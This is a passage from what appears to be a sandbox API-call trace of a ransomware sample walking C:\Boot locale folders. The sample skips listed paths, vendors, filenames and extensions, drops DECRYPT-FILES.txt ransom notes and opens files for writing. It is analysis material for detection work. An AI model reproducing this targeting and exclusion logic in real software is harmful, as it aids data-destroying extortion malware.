StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch=":\\Windows") returned 0x0 [0071.280] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\Games\\") returned 0x0 [0071.280] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.280] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.280] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.280] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.280] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.280] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\All Users") returned 0x0 [0071.280] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.280] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.280] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.280] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="AhnLab") returned 0x0 [0071.280] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.280] lstrlenW (lpString="C:\\Boot\\nb-NO\\") returned 14 [0071.280] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.280] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\nb-NO\\\\jkbimi8.tmp") returned 26 [0071.280] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\\\jkbimi8.tmp" (normalized: "c:\\boot\\nb-no\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.281] lstrlenW (lpString="C:\\Boot\\nb-NO\\") returned 14 [0071.281] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.281] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\nb-NO\\\\DECRYPT-FILES.txt") returned 32 [0071.281] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\nb-no\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.281] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.293] CloseHandle (hObject=0x424) returned 1 [0071.293] lstrlenW (lpString="C:\\Boot\\nb-NO\\") returned 14 [0071.293] lstrcatW (in: lpString1="C:\\Boot\\nb-NO\\", lpString2="*" | out: lpString1="C:\\Boot\\nb-NO\\*") returned="C:\\Boot\\nb-NO\\*" [0071.293] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b5d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.293] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.293] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b5d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.294] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.294] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.294] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.294] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.294] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.294] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.294] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.294] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.294] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.294] lstrlenW (lpString="C:\\Boot\\nb-NO\\") returned 14 [0071.294] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.294] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\nb-NO\\" | out: lpString1="C:\\Boot\\nb-NO\\") returned="C:\\Boot\\nb-NO\\" [0071.294] lstrcatW (in: lpString1="C:\\Boot\\nb-NO\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned="C:\\Boot\\nb-NO\\bootmgr.exe.mui" [0071.294] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.294] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.303] CloseHandle (hObject=0x0) returned 0 [0071.303] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.303] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b5d8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b83a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.303] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.303] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b5d8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b5d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.303] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.303] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.303] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.303] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.303] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.303] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.303] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.303] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.303] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.303] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.303] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.303] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.303] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.303] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.303] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.303] lstrlenW (lpString="C:\\Boot\\nb-NO\\") returned 14 [0071.303] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.304] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\nb-NO\\" | out: lpString1="C:\\Boot\\nb-NO\\") returned="C:\\Boot\\nb-NO\\" [0071.304] lstrcatW (in: lpString1="C:\\Boot\\nb-NO\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\nb-NO\\jkbimi8.tmp") returned="C:\\Boot\\nb-NO\\jkbimi8.tmp" [0071.304] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.304] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\jkbimi8.tmp" (normalized: "c:\\boot\\nb-no\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.304] CloseHandle (hObject=0x0) returned 0 [0071.304] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.304] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b5d8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b5d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.304] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.304] CloseHandle (hObject=0x420) returned 1 [0071.305] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0071.305] lstrcmpW (lpString1="nl-NL", lpString2=".") returned 1 [0071.305] lstrcmpW (lpString1="nl-NL", lpString2="..") returned 1 [0071.305] lstrcatW (in: lpString1="nl-NL", lpString2="\\" | out: lpString1="nl-NL\\") returned="nl-NL\\" [0071.305] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="nl-NL\\" | out: lpString1="C:\\Boot\\nl-NL\\") returned="C:\\Boot\\nl-NL\\" [0071.305] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\Program Files") returned 0x0 [0071.305] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch=":\\Windows") returned 0x0 [0071.305] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\Games\\") returned 0x0 [0071.305] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.305] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.305] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.305] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.305] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.305] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\All Users") returned 0x0 [0071.305] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.305] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.305] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.305] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="AhnLab") returned 0x0 [0071.305] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.305] lstrlenW (lpString="C:\\Boot\\nl-NL\\") returned 14 [0071.305] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.305] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\nl-NL\\\\jkbimi8.tmp") returned 26 [0071.305] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\\\jkbimi8.tmp" (normalized: "c:\\boot\\nl-nl\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.305] lstrlenW (lpString="C:\\Boot\\nl-NL\\") returned 14 [0071.305] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.305] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\nl-NL\\\\DECRYPT-FILES.txt") returned 32 [0071.306] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\nl-nl\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.306] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.307] CloseHandle (hObject=0x424) returned 1 [0071.307] lstrlenW (lpString="C:\\Boot\\nl-NL\\") returned 14 [0071.307] lstrcatW (in: lpString1="C:\\Boot\\nl-NL\\", lpString2="*" | out: lpString1="C:\\Boot\\nl-NL\\*") returned="C:\\Boot\\nl-NL\\*" [0071.307] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.307] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.307] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.307] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.307] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.307] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.307] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.308] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.308] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.308] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.308] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.308] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.308] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.308] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.308] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.308] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.308] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.308] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.308] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.308] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.308] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.308] lstrlenW (lpString="C:\\Boot\\nl-NL\\") returned 14 [0071.308] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.308] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\nl-NL\\" | out: lpString1="C:\\Boot\\nl-NL\\") returned="C:\\Boot\\nl-NL\\" [0071.308] lstrcatW (in: lpString1="C:\\Boot\\nl-NL\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned="C:\\Boot\\nl-NL\\bootmgr.exe.mui" [0071.308] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.308] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.308] CloseHandle (hObject=0x0) returned 0 [0071.308] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.309] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ba9ba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.309] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.309] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ba9ba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.309] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.309] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.309] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.309] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.309] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.309] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.309] lstrlenW (lpString="C:\\Boot\\nl-NL\\") returned 14 [0071.309] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.309] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\nl-NL\\" | out: lpString1="C:\\Boot\\nl-NL\\") returned="C:\\Boot\\nl-NL\\" [0071.309] lstrcatW (in: lpString1="C:\\Boot\\nl-NL\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\nl-NL\\jkbimi8.tmp") returned="C:\\Boot\\nl-NL\\jkbimi8.tmp" [0071.309] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.309] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\jkbimi8.tmp" (normalized: "c:\\boot\\nl-nl\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.310] CloseHandle (hObject=0x0) returned 0 [0071.310] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.310] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ba9ba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.310] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.310] CloseHandle (hObject=0x420) returned 1 [0071.310] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0071.310] lstrcmpW (lpString1="pl-PL", lpString2=".") returned 1 [0071.310] lstrcmpW (lpString1="pl-PL", lpString2="..") returned 1 [0071.310] lstrcatW (in: lpString1="pl-PL", lpString2="\\" | out: lpString1="pl-PL\\") returned="pl-PL\\" [0071.310] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="pl-PL\\" | out: lpString1="C:\\Boot\\pl-PL\\") returned="C:\\Boot\\pl-PL\\" [0071.310] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\Program Files") returned 0x0 [0071.310] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch=":\\Windows") returned 0x0 [0071.310] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\Games\\") returned 0x0 [0071.310] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.310] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.310] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.310] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.310] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.310] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\All Users") returned 0x0 [0071.310] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.311] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.311] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.311] StrStrW (lpFirst="C:\\Boot\\pl-PL\\", lpSrch="AhnLab") returned 0x0 [0071.311] StrStrW 